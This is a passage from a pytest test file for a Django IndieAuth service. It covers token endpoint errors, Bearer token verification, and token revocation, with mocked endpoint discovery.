response = client.post(target, data=post_data)
assert response.status_code == 400
assert response.json() == {"non_field_errors": ["Token not found"]}
assert not ninka_mock.called
def test_error_if_redirect_doesnt_match(self, target, client, ninka_mock, post_data, t_token):
post_data["redirect_uri"] = "http://local.test"
ninka_mock.return_value = {"redirect_uri": []}
response = client.post(target, data=post_data)
assert response.status_code == 400
assert response.json() == {"non_field_errors": ["Redirect uri not found on client app"]}
ninka_mock.assert_called_with(post_data["client_id"])
@pytest.mark.django_db
class TestVerifyIndieAuthToken:
@pytest.fixture
def target(self):
return "/a/indieauth/token"
def test_valid(self, target, client, t_token_access, auth_token, client_id):
client.credentials(HTTP_AUTHORIZATION=f"Bearer {auth_token}")
response = client.get(target)
assert response.status_code == 200
assert response.json() == {
"me": f"/author/{t_token_access.user.username}/",
"client_id": client_id,
"scope": "create update",
}
def test_no_header(self, target, client):
response = client.get(target)
assert response.status_code == 400
assert response.json() == {"message": "Invalid token header. No credentials provided."}
def test_no_token_found(self, target, client):
client.credentials(HTTP_AUTHORIZATION="Bearer hogehoge")
response = client.get(target)
assert response.status_code == 400
assert response.json() == {"token": ["Token not found."]}
@pytest.mark.django_db
class TestIndieAuthTokenRevoke:
@pytest.fixture
def target(self):
return "/a/indieauth/token"
@pytest.fixture
def post_data(self, auth_token, client_id):
return {
"action": "revoke",
"token": auth_token,
}
@pytest.fixture
def ninka_mock(self, monkeypatch):
from ninka.indieauth import discoverAuthEndpoints
m = mock.Mock(discoverAuthEndpoints, autospec=True)
monkeypatch.setattr("indieweb.serializers.discoverAuthEndpoints", m)
return m
def test_valid(self, target, client, ninka_mock, post_data, t_token_access, auth_token):
assert TToken.objects.filter(key=auth_token).exists() is True
response = client.post(target, data=post_data)
assert response.status_code == 200
assert TToken.objects.filter(key=auth_token).exists() is False
def test_requires_revoke(self, target, client, ninka_mock, post_data, t_token_access, auth_token):
post_data["action"] = "hoge"
assert TToken.objects.filter(key=auth_token).exists() is True
response = client.post(target, data=post_data)
assert response.status_code == 400
assert TToken.objects.filter(key=auth_token).exists() is True
|